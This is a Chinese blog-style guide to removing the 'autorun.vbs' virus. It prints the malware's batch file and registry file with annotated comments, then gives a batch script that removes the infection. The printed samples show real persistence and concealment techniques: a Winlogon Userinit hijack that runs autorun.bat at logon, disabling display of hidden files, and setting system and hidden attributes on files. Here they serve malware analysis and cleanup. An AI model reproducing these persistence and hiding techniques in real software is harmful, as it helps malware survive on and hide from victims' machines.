autorun.vbs病毒的清除办法

症状：计算机里面出现一堆autorun为文件名称的文件，删除后出现找不到autorun.vbs的提示。我就打开当中的一个文件：Autorun.bat，内容例如以下：

@echo off  //不显示系统提示符
rem autorun风暴   //病毒名称：autorun风暴
if exist ./autorun.reg regedit /s ./autorun.reg  //假设存在该文件夹下的autoun.reg注冊表文件写入注冊表
if not "%1"=="" goto open   //注冊表文件导入成功，进入open标记处。
if exist autorun.vbs start WScript.exe autorun.vbs&exit  //假设存在autorun.vbs，则使用WScript.exe将VBS文件执行，然后退出。
if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit  //假设系统文件夹下的system32内有autorun.vbs，那么用WScript.exe执行VBS，然后退出。
exit  //退出
:open  //标记为open
if not "%1"=="Open" goto next  //假设open成功，进入next标记
start explorer ./   //開始当前文件夹
exit  // 退出
:next  //标记为netx
if not "%1"=="Over" goto :next2  //假设标记不成功，进入next2标记
if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit   //假设当前文件夹存在Autorun.bin，将autorun.bin写入到C盘的autorun.txt文件，然后退出。
if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit  //假设系统文件夹system32下存在Autorun.bin，将autorun.bin写入到C盘的autorun.txt文件，然后退出。
exit   //退出
:next2     //标记为next2
if "%1"=="-" attrib -s -a -h -r %2/autorun.*    //先标记全部autorun开头的文件为非系统、非仅仅读、非隐藏、非..文件
if "%1"=="+" attrib +s +a +h +r %2/autorun.*  //先标记全部autorun开头的文件为系统、仅仅读、隐藏、..文件
:end   //结束

文件二：Autorun.reg

Windows Registry Editor Version 5.00  //Windows 注冊表编辑器 5.00创建
autorun风暴   //autorun风暴
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上加入一个autorun.bat运行文件。

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
"ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

我倒，这个病毒还真有点搞笑，连杀毒说明书都写好了，只是，作者显然是个好学生，老师教的要写好凝视真的没错啊！

杀毒方法：

能够制作一个批处理文件来进行，内容例如以下：
@echo on
taskkill /im explorer.exe /f
taskkill /im wscript.exe
start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
start reg import kill.reg
del c:/autorun.* /f /q /as
del %SYSTEMROOT%/system32/autorun.* /f /q /as
del d:/autorun.* /f /q /as
del e:/autorun.* /f /q /as
del f:/autorun.* /f /q /as
你的盘符多就多写几个
start explorer.exe

运行它即可了。